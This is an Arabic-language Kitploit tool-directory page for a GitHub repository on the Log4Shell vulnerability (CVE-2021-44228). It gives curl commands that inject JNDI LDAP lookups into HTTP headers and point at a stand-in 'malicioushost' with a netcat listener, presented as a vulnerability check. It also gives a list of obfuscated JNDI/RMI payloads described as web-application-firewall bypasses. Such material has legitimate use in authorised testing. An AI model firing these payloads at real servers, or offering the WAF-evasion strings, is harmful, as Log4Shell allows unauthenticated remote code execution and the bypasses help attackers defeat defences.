Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
log4j-CVE-2021-44228 — CVE-2021-44228 | Kitploit
أدوات/GitHubGitHub/sud0x00/log4j-cve-2021-44228
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتجاوز WAFأداة الوصول عن بعد
GitHubsud0x00/log4j-cve-2021-44228

log4j-CVE-2021-44228

CVE-2021-44228

عرض المستودع
54منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

log4j-CVE-2021-44228

في 5 ديسمبر 2021، حددت Apache ثغرة أمنية (عُرفت لاحقًا باسم CVE-2021-44228) في خدمة تسجيل Log4j المستخدمة على نطاق واسع. هذه الثغرة، المعروفة أيضًا باسم Log4shell، تتيح للمهاجمين السيطرة الكاملة على الخوادم المتأثرة من خلال السماح بتنفيذ تعليمات برمجية عن بُعد دون مصادقة إذا كان المستخدم يشغّل تطبيقًا يستخدم مكتبة تسجيل Java. Log4j مدمج بشكل كبير في مجموعة واسعة من أطر عمل devops، وأنظمة تكنولوجيا المعلومات المؤسسية، وبرامج البائعين، ومنتجات السحابة.

نفّذ ما يلي على المضيف البعيد الخبيث للتحقق مما إذا كان خادمك عرضة لاستغلال Log4j

curl vulnserver:port -H 'X-Api-Version: ${jndi:ldap://malicioushost:mport/a}'

nc -lnvp mport

يمكن استخدام أشكال أخرى تتضمن طلب HTTP-POST للتحقق من الثغرة

curl -H 'User-Agent: ${jndi:ldap://malicioushost:mport/a}' vulnserver:port

لتجاوز جدار حماية تطبيقات الويب

root@kitploit:~
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
تنزيل الأداة